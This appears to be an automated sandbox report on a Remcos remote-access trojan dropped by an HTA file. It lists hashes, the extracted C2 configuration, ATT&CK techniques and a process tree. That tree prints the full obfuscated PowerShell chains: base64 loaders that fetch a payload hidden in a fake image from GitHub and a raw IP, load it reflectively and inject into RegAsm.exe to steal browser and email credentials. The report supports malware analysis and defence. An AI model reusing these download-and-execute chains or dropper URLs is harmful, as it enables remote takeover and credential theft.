remcos | c6e6ef4d2a7c8dc43e114496de98a777e783cd554aa258736ef126ff8628d8c2

Analysis

max time kernel
149s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-10-2024 14:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

verynicegirlneedsuperkiisingfromtheboy.hta
Size

130KB
MD5

bfa06f35d87c1939017d70c204d3a7d5
SHA1

bb80945300d62122564399f088f09d1760172c20
SHA256

c6e6ef4d2a7c8dc43e114496de98a777e783cd554aa258736ef126ff8628d8c2
SHA512

04465026afe312e8fa1420d8341f57c2742c2ee4ccc57f65659b77d31cc6cfa084787f587114fa05b75d8b0fcee87d55d67e162fb75f3ec92c0e9f5c4a06b0fa
SSDEEP

96:Eam7SVApoWIApM8RM9vZnQ8vFYDJuPPxfiApohP7T:Ea2SVAqzAelZFYF3AEDT

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

Extracted

Family

remcos

Botnet

RemoteHost

idabo.duckdns.org:6875

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-0MWW62
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/2000-130-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/2892-134-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/4844-129-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/4844-129-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/2000-130-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
22	4244	PoWershELl.exE
25	4372	powershell.exe
26	4372	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
364	powershell.exe
4372	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
4244	PoWershELl.exE
3372	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	raw.githubusercontent.com
25	raw.githubusercontent.com

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4372 set thread context of 228	4372	powershell.exe	102
PID 228 set thread context of 2000	228	RegAsm.exe	105
PID 228 set thread context of 4844	228	RegAsm.exe	106
PID 228 set thread context of 2892	228	RegAsm.exe	111

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWershELl.exE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	PoWershELl.exE

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
4244	PoWershELl.exE
4244	PoWershELl.exE
3372	powershell.exe
3372	powershell.exe
364	powershell.exe
364	powershell.exe
4372	powershell.exe
4372	powershell.exe
2000	RegAsm.exe
2000	RegAsm.exe
2892	RegAsm.exe
2892	RegAsm.exe
2000	RegAsm.exe
2000	RegAsm.exe

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
228	RegAsm.exe
228	RegAsm.exe
228	RegAsm.exe
228	RegAsm.exe
228	RegAsm.exe
228	RegAsm.exe
228	RegAsm.exe
228	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4244	PoWershELl.exE
Token: SeDebugPrivilege	3372	powershell.exe
Token: SeDebugPrivilege	364	powershell.exe
Token: SeDebugPrivilege	4372	powershell.exe
Token: SeDebugPrivilege	2892	RegAsm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
228	RegAsm.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 4560 wrote to memory of 4244	4560	mshta.exe	85
PID 4560 wrote to memory of 4244	4560	mshta.exe	85
PID 4560 wrote to memory of 4244	4560	mshta.exe	85
PID 4244 wrote to memory of 3372	4244	PoWershELl.exE	89
PID 4244 wrote to memory of 3372	4244	PoWershELl.exE	89
PID 4244 wrote to memory of 3372	4244	PoWershELl.exE	89
PID 4244 wrote to memory of 620	4244	PoWershELl.exE	92
PID 4244 wrote to memory of 620	4244	PoWershELl.exE	92
PID 4244 wrote to memory of 620	4244	PoWershELl.exE	92
PID 620 wrote to memory of 2336	620	csc.exe	93
PID 620 wrote to memory of 2336	620	csc.exe	93
PID 620 wrote to memory of 2336	620	csc.exe	93
PID 4244 wrote to memory of 2456	4244	PoWershELl.exE	97
PID 4244 wrote to memory of 2456	4244	PoWershELl.exE	97
PID 4244 wrote to memory of 2456	4244	PoWershELl.exE	97
PID 2456 wrote to memory of 364	2456	WScript.exe	98
PID 2456 wrote to memory of 364	2456	WScript.exe	98
PID 2456 wrote to memory of 364	2456	WScript.exe	98
PID 364 wrote to memory of 4372	364	powershell.exe	100
PID 364 wrote to memory of 4372	364	powershell.exe	100
PID 364 wrote to memory of 4372	364	powershell.exe	100
PID 4372 wrote to memory of 228	4372	powershell.exe	102
PID 4372 wrote to memory of 228	4372	powershell.exe	102
PID 4372 wrote to memory of 228	4372	powershell.exe	102
PID 4372 wrote to memory of 228	4372	powershell.exe	102
PID 4372 wrote to memory of 228	4372	powershell.exe	102
PID 4372 wrote to memory of 228	4372	powershell.exe	102
PID 4372 wrote to memory of 228	4372	powershell.exe	102
PID 4372 wrote to memory of 228	4372	powershell.exe	102
PID 4372 wrote to memory of 228	4372	powershell.exe	102
PID 4372 wrote to memory of 228	4372	powershell.exe	102
PID 4372 wrote to memory of 228	4372	powershell.exe	102
PID 4372 wrote to memory of 228	4372	powershell.exe	102
PID 228 wrote to memory of 3564	228	RegAsm.exe	104
PID 228 wrote to memory of 3564	228	RegAsm.exe	104
PID 228 wrote to memory of 3564	228	RegAsm.exe	104
PID 228 wrote to memory of 2000	228	RegAsm.exe	105
PID 228 wrote to memory of 2000	228	RegAsm.exe	105
PID 228 wrote to memory of 2000	228	RegAsm.exe	105
PID 228 wrote to memory of 2000	228	RegAsm.exe	105
PID 228 wrote to memory of 4844	228	RegAsm.exe	106
PID 228 wrote to memory of 4844	228	RegAsm.exe	106
PID 228 wrote to memory of 4844	228	RegAsm.exe	106
PID 228 wrote to memory of 4844	228	RegAsm.exe	106
PID 228 wrote to memory of 4656	228	RegAsm.exe	107
PID 228 wrote to memory of 4656	228	RegAsm.exe	107
PID 228 wrote to memory of 4656	228	RegAsm.exe	107
PID 228 wrote to memory of 1724	228	RegAsm.exe	108
PID 228 wrote to memory of 1724	228	RegAsm.exe	108
PID 228 wrote to memory of 1724	228	RegAsm.exe	108
PID 228 wrote to memory of 4620	228	RegAsm.exe	109
PID 228 wrote to memory of 4620	228	RegAsm.exe	109
PID 228 wrote to memory of 4620	228	RegAsm.exe	109
PID 228 wrote to memory of 2292	228	RegAsm.exe	110
PID 228 wrote to memory of 2292	228	RegAsm.exe	110
PID 228 wrote to memory of 2292	228	RegAsm.exe	110
PID 228 wrote to memory of 2892	228	RegAsm.exe	111
PID 228 wrote to memory of 2892	228	RegAsm.exe	111
PID 228 wrote to memory of 2892	228	RegAsm.exe	111
PID 228 wrote to memory of 2892	228	RegAsm.exe	111

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\verynicegirlneedsuperkiisingfromtheboy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4560
- C:\Windows\SysWOW64\WINDOwsPowERshElL\V1.0\PoWershELl.exE
  "C:\Windows\SYStEM32\WINDOwsPowERshElL\V1.0\PoWershELl.exE" "PoweRShell -eX ByPAsS -NoP -w 1 -C DeVIcecrEdEntiAldepLoYMent.eXe ; ieX($(iEX('[sySTeM.texT.encODIng]'+[cHAr]0x3a+[cHAR]58+'Utf8.GeTstRING([SystEm.CONVERT]'+[CHaR]58+[chAr]0x3A+'fROMBase64STRInG('+[ChaR]0x22+'JHJWalU4b2hIMmVuICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFcmRFZkluaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTWJUbE9NRkksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2hDLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdNSSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJzdWN3aUZLTkQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGSmZiakxZUlcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRyVmpVOG9oSDJlbjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC40MC85OTA5L25pY2VwaWN0dXJld2l0aGhlcmxpcHNvbnRoZWxpcHN0aWN3aXRoaGVyLnRpRiIsIiRlTnY6QVBQREFUQVxuaWNlcGljdHVyZXdpdGhoZXJsaXBzb250aGVsaXBzdGljd2l0aGhlci52YlMiLDAsMCk7U1RBUnQtU0xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcbmljZXBpY3R1cmV3aXRoaGVybGlwc29udGhlbGlwc3RpY3dpdGhoZXIudmJTIg=='+[cHar]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4244
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPAsS -NoP -w 1 -C DeVIcecrEdEntiAldepLoYMent.eXe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3372
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5mrzjpqy\5mrzjpqy.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:620
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8722.tmp" "c:\Users\Admin\AppData\Local\Temp\5mrzjpqy\CSC33650DDA86D949CEAEDDFABD81CEC4E.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2336
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicepicturewithherlipsonthelipsticwithher.vbS"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2456
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aW52b2tlLWV4cHJlU1NJb24oKCgnezF9aW1hZ2VVcmwgPSB7MH1odHRwczovL3Jhdy5naXRodWJ1c2VyY29udGUnKydudC5jb20vQ3J5cHQnKydlcnNBbmRUb29sc09maWNpYWwvWklQL3JlZnMvaGVhZHMvbWFpbi9EZXRhaE5vdGVfVi5qcGcnKycgezB9JysnO3sxfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk4nKydldCcrJy5XZWJDbGllbnQ7ezF9aW1hZ2VCeXRlcyA9IHsxfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezF9aW1hZ2VVcmwpO3sxfWltYWdlVGV4dCA9IFtTeXN0ZW0uJysnVGV4dC5FbmNvZGknKyduZ106OlVURicrJzguR2V0UycrJ3RyaW5nKHsxfWltYWdlQnl0ZXMpO3sxfXN0YXJ0RmxhZyA9IHsnKycwJysnfTw8QkFTRTY0X1NUQVJUPj57MH07ezEnKyd9ZW5kRmxhZyA9IHswfTw8QkFTRTY0X0VORD4+ezB9O3sxJysnfXN0YXJ0SW5kZXggPSB7MX1pbWFnZVRleHQuSW5kZXhPZih7MScrJ31zdGFydEZsYWcpO3sxfScrJ2VuZEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9ZW5kRmxhZyk7ezF9c3RhcnRJbmRleCAtZ2UgMCAtYW5kIHsxfWVuZEluZGV4IC1ndCB7MX1zdGFydEluZGV4O3sxfXN0YXJ0SW5kZXggKz0gezF9c3RhcnRGbGFnLkxlbmd0aDt7MX1iYXNlNjRMZW5ndGggPSB7MX1lbmRJbmRleCAtIHsxfXN0YXJ0SW5kJysnZXg7ezF9YmFzZTY0Q29tbWFuZCA9IHsxfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezF9c3RhcnRJbmRleCwgezF9YmFzZTY0JysnTGVuZ3RoKTt7MX1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTYnKyc0U3RyaW5nJysnKHsxfWJhc2U2JysnNENvbW1hbicrJ2QpO3sxfWxvYWRlZEFzc2VtYmx5ID0gW1MnKyd5c3RlbScrJy5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh7MX1jb21tYW5kQnl0ZXMpO3sxfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoezB9VkFJezB9KTt7MX12YWlNZXRob2QuSW52b2tlKHsxfW51bCcrJ2wsIEAoezB9dHh0LkZDQ0VSUi85MDk5LzA0JysnLjAyMi4zLjI5MS8vOnB0dGh7MH0sIHswfWRlc2F0aXZhJysnZG97MH0sIHswfWQnKydlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZCcrJ2VzYXRpdmFkb3swfSkpOycpLUZbY2hBUl0zOSxbY2hBUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:364
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "invoke-expreSSIon((('{1}imageUrl = {0}https://raw.githubuserconte'+'nt.com/Crypt'+'ersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg'+' {0}'+';{1}webClient = New-Object System.N'+'et'+'.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUrl);{1}imageText = [System.'+'Text.Encodi'+'ng]::UTF'+'8.GetS'+'tring({1}imageBytes);{1}startFlag = {'+'0'+'}<<BASE64_START>>{0};{1'+'}endFlag = {0}<<BASE64_END>>{0};{1'+'}startIndex = {1}imageText.IndexOf({1'+'}startFlag);{1}'+'endIndex = {1}imageText.IndexOf({1}endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startInd'+'ex;{1}base64Command = {1}im'+'ageText.Substring({1}startIndex, {1}base64'+'Length);{1}commandBytes = [System.Convert]::FromBase6'+'4String'+'({1}base6'+'4Comman'+'d);{1}loadedAssembly = [S'+'ystem'+'.Refl'+'ection.Assembly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}nul'+'l, @({0}txt.FCCERR/9099/04'+'.022.3.291//:ptth{0}, {0}desativa'+'do{0}, {0}d'+'esativado{0}, {0}desativado{0}, {0}RegAsm{0}, {0}desativado{0}, {0}d'+'esativado{0}));')-F[chAR]39,[chAR]36) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4372
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:228
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\glhtzwcl"
        7⤵
        
        PID:3564
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\glhtzwcl"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2000
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\inmmaonfzlm"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:4844
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\thswbhyhvuelat"
        7⤵
        
        PID:4656
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\thswbhyhvuelat"
        7⤵
        
        PID:1724
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\thswbhyhvuelat"
        7⤵
        
        PID:4620
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\thswbhyhvuelat"
        7⤵
        
        PID:2292
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\thswbhyhvuelat"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
102B

MD5
f73f484f427513dfe28105ef54820340

SHA1
1f31759c1b7d061dfbfebf2681c72743f419bead

SHA256
e87914edb143b0bd99e042aa78cd6bfe3152ee13580141f7a624118093b1aa02

SHA512
8bb689ae659c754c0869d6789fb601e4cd34c33fef0b40b95319714fd8450d788f8d0ea2c647b0e13ab330a5ed4fba8f5f73a2d733e2e97e7431fe95092dfe9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PoWershELl.exE.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
8cbdc8c2ab6b6ba6bc8cb0575975677c

SHA1
554d7e5a9885eb7998f2237ed8225018dfc0f0de

SHA256
28c780c29f584674bfa887bc62fe714339aec9566613ae4cd94d12843c75cdbf

SHA512
46e11da9fe4c639a0624f8de8751c703c8d64c72cdc060995978ae4720de386573ba7901460b87cf028621634064f3b589b3f26a4fec19bacfbdab854752a038

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2954246442a5f8e15f66bcc46bc1d6b2

SHA1
c0e62812d0a562ee42a6d723793167692af9f4c5

SHA256
0a61bd407d66a4cd4e7e944b61d7a50669149b7228e337b087490d5bf000525d

SHA512
891098ee9896e6fd475287af2d73cff07a7ba97862283fe2bae0ef1f44866f040c862ddf00b2df741e3ce98bda98b2eeb7f7bf2999011e800edb115479ac9e09

Download Submit
C:\Users\Admin\AppData\Local\Temp\5mrzjpqy\5mrzjpqy.dll

Filesize
3KB

MD5
fcd4fdcd256cfab8398bc4a16c70bf38

SHA1
1d6b1e261ddd4a09ab638ccb97b7337eeffc4333

SHA256
aa266858fcd486aa79a95251568a4a827ca692370df43b4368ef425f2e53e954

SHA512
53505b1cc3eb3ab51705120205c800b6f735bbdb310f3e058b20f3afe4763a1ac107ce484ac6ef9bf0608105fa057e80d381596d54d9c218e4edd9eb706defa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8722.tmp

Filesize
1KB

MD5
86a8335e37f5eb0dcc637800bfc5f980

SHA1
5be340930664c1aaf5e2f2dcfd430690f8d37fd7

SHA256
d2f0c905ce2aaf2d01d5efcaf5ce7d229339b9f169060a23350882a009a1f7e0

SHA512
3e99e9e4ceb3b2f834e53d562148760923af956189a4b56bb241833355a88ccf0ae084cc8dcd653a1c1a9d27114e49ff5726ddabd7aaced1f9482628a844c5f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ef1v0sov.wvg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\glhtzwcl

Filesize
4KB

MD5
bc25ccf39db8626dc249529bcc8c5639

SHA1
3e9cbdb20a0970a3c13719a2f289d210cdcc9e1d

SHA256
b333f8c736c701bc826886f395d928731850cbce6db77be752b3cf7979114904

SHA512
9a546127bddc1d187e674cda82e6c5046cac7f3e6f9515aed68d5bff2264b9d679d857dd97270e10826cd11ce2d92d82dd7f9801e19027e346b60bcc814cca1a

Download Submit
C:\Users\Admin\AppData\Roaming\nicepicturewithherlipsonthelipsticwithher.vbS

Filesize
190KB

MD5
2a9ee6d8ccd6eb9798a180e0e92c889c

SHA1
7871c7bfb07c278debbe50d3eff2b372918973e0

SHA256
56ba91564c0cdf1671dc0ebcd1c1323553627cd5f5e7622a1b66823e5e950650

SHA512
e5ada7fe9381706a7890d48a4b564e766030cca0e109c77a74e54354c390fe2d3981574a8ebed2d7e800148ba6cd245af4c11a4a0c105f56d6e19cdb89905e71

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5mrzjpqy\5mrzjpqy.0.cs

Filesize
463B

MD5
ef1a52e62eb8136f57673b29cba789f5

SHA1
5d35e639e96c2d15d383b03ec1cbe89efd8ee75e

SHA256
dcf176d49fc46c4c6441a96381c4e85cd8af1b43a1468e05872538ed8c1f3584

SHA512
ad531d19065b816a6aa92a235ad89162bc68c256cce64859c1ba75ef72c4bd5343377fee478d019b2010d7defec7921aa96f84c0a75a1d66737de0735e9f0139

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5mrzjpqy\5mrzjpqy.cmdline

Filesize
369B

MD5
580585ab34e6756a00bdb84dc066f0b8

SHA1
ac982ddb1a4138240eb959f64c38a9fc3bc5f9fa

SHA256
f6155ca041e2c33a565951e219a93f6be4e79c92611b478c4c43b8d4c50bbdcc

SHA512
